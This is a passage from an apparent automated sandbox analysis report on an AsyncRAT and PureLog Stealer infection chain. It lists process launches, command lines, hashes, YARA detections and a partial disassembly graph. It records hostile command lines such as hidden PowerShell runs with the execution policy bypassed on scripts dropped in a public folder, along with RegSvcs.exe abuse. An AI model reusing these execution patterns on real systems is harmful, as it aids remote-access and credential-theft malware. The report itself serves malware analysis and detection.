                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
                                            Imagebase:0x7ff638f60000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:16:35:02
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:16:35:02
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\net.exe" session
                                            Imagebase:0x7ff7ed130000
                                            File size:59'904 bytes
                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:16:35:02
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:16:35:02
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net1.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\net1 session
                                            Imagebase:0x7ff7d7450000
                                            File size:183'808 bytes
                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:18
                                            Start time:16:35:03
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
                                            Imagebase:0x7ff638f60000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:19
                                            Start time:16:35:03
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:16:35:03
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            General

                                            Target ID:22
                                            Start time:16:35:10
                                            Start date:14/03/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Imagebase:0xa70000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4626854201.0000000005247000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4523483443.0000000001029000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4646402691.00000000066FB000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4523483443.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4647656889.000000000673B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4626854201.0000000005230000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4646275028.00000000066F7000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:false

                                            General

                                            Target ID:24
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:25
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\net.exe" session
                                            Imagebase:0x7ff7ed130000
                                            File size:59'904 bytes
                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:26
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:27
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net1.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\net1 session
                                            Imagebase:0x7ff7d7450000
                                            File size:183'808 bytes
                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:28
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
                                            Imagebase:0x7ff638f60000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:29
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:30
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Has exited:true

                                            General

                                            Target ID:31
                                            Start time:16:35:52
                                            Start date:14/03/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Imagebase:0x7a0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001F.00000002.2808356805.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            General

                                            Target ID:32
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:33
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\net.exe" session
                                            Imagebase:0x7ff7ed130000
                                            File size:59'904 bytes
                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:34
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:35
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net1.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\net1 session
                                            Imagebase:0x7ff7d7450000
                                            File size:183'808 bytes
                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:36
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
                                            Imagebase:0x7ff638f60000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:37
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:38
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Has exited:true

                                            General

                                            Target ID:39
                                            Start time:16:37:53
                                            Start date:14/03/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Imagebase:0xd40000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000027.00000002.4004352545.000000000300F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000027.00000002.3995210664.0000000001249000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:3.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:5
                                              Total number of Limit Nodes:1
                                              execution_graph 12401 7ffd348ae1d0 12402 7ffd348ae1d9 12401->12402 12403 7ffd348ae181 IUnknown_QueryInterface_Proxy 12402->12403 12405 7ffd348ae1eb 12402->12405 12404 7ffd348ae1a8 12403->12404

                                              Executed Functions

                                              Function 00007FFD348AC568 Relevance: 1.3, Instructions: 1286COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 40 7ffd348ac568-7ffd348ac85e call 7ffd348a75c0 53 7ffd348ac88a-7ffd348ac8b1 40->53 54 7ffd348ac860-7ffd348ac883 40->54 59 7ffd348ac8b3-7ffd348ac8c3 53->59 60 7ffd348ac8c4-7ffd348ac8c9 53->60 54->53 61 7ffd348ac8cb-7ffd348ac8e9 60->61 62 7ffd348ac8ec-7ffd348ac8f9 60->62 61->62 64 7ffd348ad0eb-7ffd348ad0f3 62->64 65 7ffd348ac8ff-7ffd348ac909 62->65 68 7ffd348ad0f5-7ffd348ad0fd 64->68 69 7ffd348ad14c-7ffd348ad15d 64->69 66 7ffd348ac90b-7ffd348ac927 call 7ffd348a66e0 65->66 67 7ffd348ac94e 65->67 73 7ffd348ac953 66->73 78 7ffd348ac929-7ffd348ac933 66->78 67->73 71 7ffd348ad0ff-7ffd348ad110 68->71 72 7ffd348ad12e-7ffd348ad145 call 7ffd348a7700 68->72 79 7ffd348ad129 71->79 80 7ffd348ad112-7ffd348ad127 call 7ffd348a76f0 71->80 72->69 76 7ffd348ac955-7ffd348ac95f 73->76 81 7ffd348ac965-7ffd348ac96f 76->81 82 7ffd348acaa2-7ffd348acaa5 76->82 78->67 84 7ffd348ac935-7ffd348ac94c call 7ffd348a66e0 78->84 79->72 80->69 81->67 89 7ffd348ac971-7ffd348ac98c 81->89 87 7ffd348acaab-7ffd348acab5 82->87 88 7ffd348acbc2-7ffd348acbc4 82->88 84->76 87->67 95 7ffd348acabb-7ffd348acae5 87->95 92 7ffd348acbca-7ffd348acbff 88->92 93 7ffd348acd70-7ffd348acd83 88->93 101 7ffd348ac9bb-7ffd348ac9d3 89->101 102 7ffd348ac98e-7ffd348ac9b5 89->102 98 7ffd348acc06-7ffd348acc20 92->98 104 7ffd348acd85-7ffd348acda8 93->104 105 7ffd348acdaf-7ffd348ace38 93->105 114 7ffd348acae7-7ffd348acb0a 95->114 115 7ffd348acb11-7ffd348acb48 95->115 98->98 103 7ffd348acc22-7ffd348acc7c 98->103 110 7ffd348ac9d5-7ffd348ac9f8 101->110 111 7ffd348ac9ff-7ffd348aca9d 101->111 102->82 102->101 117 7ffd348accb6-7ffd348accba 103->117 118 7ffd348acc7e-7ffd348acc88 103->118 104->105 146 7ffd348acf50-7ffd348acf82 105->146 147 7ffd348ace3e-7ffd348ace43 105->147 110->111 111->88 114->115 140 7ffd348acb4f-7ffd348acb62 115->140 126 7ffd348accd7-7ffd348accdb 117->126 127 7ffd348accbc-7ffd348acccf 117->127 118->67 124 7ffd348acc8e-7ffd348accb4 118->124 124->126 129 7ffd348acd1f-7ffd348acd29 126->129 130 7ffd348accdd-7ffd348acce7 126->130 127->126 129->67 137 7ffd348acd2f-7ffd348acd57 129->137 130->67 136 7ffd348acced-7ffd348acd1d 130->136 154 7ffd348acd5f-7ffd348acd6b 136->154 137->154 148 7ffd348acb69-7ffd348acbba 140->148 161 7ffd348acf88-7ffd348acfab 146->161 162 7ffd348ad0ca-7ffd348ad0d2 call 7ffd348ad15e 146->162 147->146 150 7ffd348ace49-7ffd348aceb9 147->150 148->88 163 7ffd348ad0d3-7ffd348ad0e5 154->163 170 7ffd348ad02e 161->170 171 7ffd348acfb1-7ffd348acfd9 161->171 162->163 163->64 163->65 176 7ffd348ad033-7ffd348ad037 170->176 183 7ffd348ad0ac-7ffd348ad0c4 171->183 184 7ffd348acfdf-7ffd348acffd 171->184 177 7ffd348ad058-7ffd348ad05c 176->177 178 7ffd348ad039-7ffd348ad056 176->178 180 7ffd348ad080-7ffd348ad099 177->180 181 7ffd348ad05e-7ffd348ad07e 177->181 178->177 195 7ffd348ad0a0-7ffd348ad0a5 180->195 181->195 183->161 183->162 184->176 190 7ffd348acfff-7ffd348ad02c 184->190 190->177 195->183
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ef394f36532d70af53920a6eb21866526a794a376fda2173e00f8b7c7955d5f
                                              • Instruction ID: dc5029c882069e21af20f32198f9d2eabd4566ec948c9e99ac041e8bec84564b
                                              • Opcode Fuzzy Hash: 6ef394f36532d70af53920a6eb21866526a794a376fda2173e00f8b7c7955d5f
                                              • Instruction Fuzzy Hash: 6972C331B19A0D8FEB94EB68C4A56B973E2FF59305F1401BDD44ED3292DE78A842CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348A91F6 Relevance: 1.1, Instructions: 1081COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 199 7ffd348a91f6-7ffd348a926d 200 7ffd348a926f-7ffd348a927f 199->200 201 7ffd348a9280-7ffd348a92b6 call 7ffd348a8de0 call 7ffd348a5a88 199->201 207 7ffd348a92b8-7ffd348a92c8 call 7ffd348a6698 201->207 208 7ffd348a92cb-7ffd348a92d4 201->208 207->208 210 7ffd348a92da-7ffd348a92fe 208->210 211 7ffd348a935f-7ffd348a9374 call 7ffd348a5ab8 208->211 210->211 215 7ffd348a9379-7ffd348a9389 211->215 216 7ffd348a93a8-7ffd348a93d0 call 7ffd348a66e8 215->216 217 7ffd348a938b-7ffd348a93a3 call 7ffd348a66a0 call 7ffd348a7618 215->217 223 7ffd348a9437-7ffd348a9443 216->223 224 7ffd348a93d2-7ffd348a9432 call 7ffd348a7730 216->224 217->216 225 7ffd348a9449-7ffd348a946d 223->225 226 7ffd348a94d1-7ffd348a94d6 223->226 252 7ffd348a9f99-7ffd348a9fb2 call 7ffd348aa0af 224->252 225->226 228 7ffd348a94dc-7ffd348a94f8 call 7ffd348a75f8 225->228 226->228 234 7ffd348a9506 228->234 235 7ffd348a94fa-7ffd348a9504 228->235 236 7ffd348a950b-7ffd348a950d 234->236 235->236 238 7ffd348a9526-7ffd348a9531 236->238 239 7ffd348a950f-7ffd348a9521 call 7ffd348a7608 236->239 242 7ffd348a9549-7ffd348a9554 238->242 243 7ffd348a9533-7ffd348a9544 call 7ffd348a7628 238->243 239->238 244 7ffd348a9556-7ffd348a9567 call 7ffd348a7638 242->244 245 7ffd348a956c-7ffd348a9577 242->245 243->242 244->245 248 7ffd348a9579-7ffd348a958a call 7ffd348a7648 245->248 249 7ffd348a958f-7ffd348a959a 245->249 248->249 253 7ffd348a959c-7ffd348a95ad call 7ffd348a7568 249->253 254 7ffd348a95b2-7ffd348a95bd 249->254 253->254 257 7ffd348a95d5-7ffd348a95e0 254->257 258 7ffd348a95bf-7ffd348a95d0 call 7ffd348a7588 254->258 261 7ffd348a95f8-7ffd348a9603 257->261 262 7ffd348a95e2-7ffd348a95f3 call 7ffd348a7598 257->262 258->257 264 